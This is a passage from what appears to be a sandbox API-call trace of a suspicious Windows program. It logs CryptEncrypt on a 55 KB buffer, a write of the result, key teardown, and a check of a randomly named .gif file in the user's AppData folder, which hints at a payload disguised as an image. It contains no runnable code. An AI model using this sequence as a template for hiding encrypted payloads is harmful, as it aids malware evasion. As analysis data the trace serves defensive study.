wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.399] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.399] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.399] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.399] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.399] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.399] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.401] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xd7ac, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xd7b0) returned 1 [0152.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.401] CharLowerBuffW (in: lpsz="byte[55216]", cchLength=0xb | out: lpsz="byte[55216]") returned 0xb [0152.401] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.404] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.404] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.404] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.404] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.404] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0152.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0152.410] CryptEncrypt (in: hKey=0x9e20f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd7ac, dwBufLen=0xd7b0 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0xd7b0) returned 1 [0152.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.412] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.413] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.413] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.413] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.413] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.413] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.413] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.413] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.413] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.414] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.414] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.414] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.414] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.414] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.414] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.419] WriteFile (in: hFile=0x4f8, lpBuffer=0x2aaf410*, nNumberOfBytesToWrite=0xd7b0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaf410*, lpNumberOfBytesWritten=0x8cf5e4*=0xd7b0, lpOverlapped=0x0) returned 1 [0152.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.421] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.421] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0152.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.421] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0152.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.421] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.421] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.421] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0152.422] CryptDestroyKey (hKey=0x9e20f8) returned 1 [0152.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.422] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.422] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.422] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.422] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.422] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.422] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.423] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.423] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.423] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.438] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.438] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0152.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.438] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.438] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0152.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.438] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0152.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.438] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.439] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.439] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.439] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.439] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.439] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0152.439] CryptReleaseContext (hProv=0x9bf110, dwFlags=0x0) returned 1 [0152.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.439] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.440] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.440] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.440] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.440] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.440] FreeLibrary (hLibModule=0x76390000) returned 1 [0152.440] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.440] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.440] CloseHandle (hObject=0x4a4) returned 1 [0152.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.442] CloseHandle (hObject=0x4f8) returned 1 [0152.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.446] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.446] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.446] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.446] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/x_7SfFt5-eJAhmf88.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif", lpFilePart=0x8cedf4*="x_7SfFt5-eJAhmf88.gif") returned 0x35 [0152.446] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\x_7sfft5-ejahmf88.gif")) returned 0x20 [0152.446] 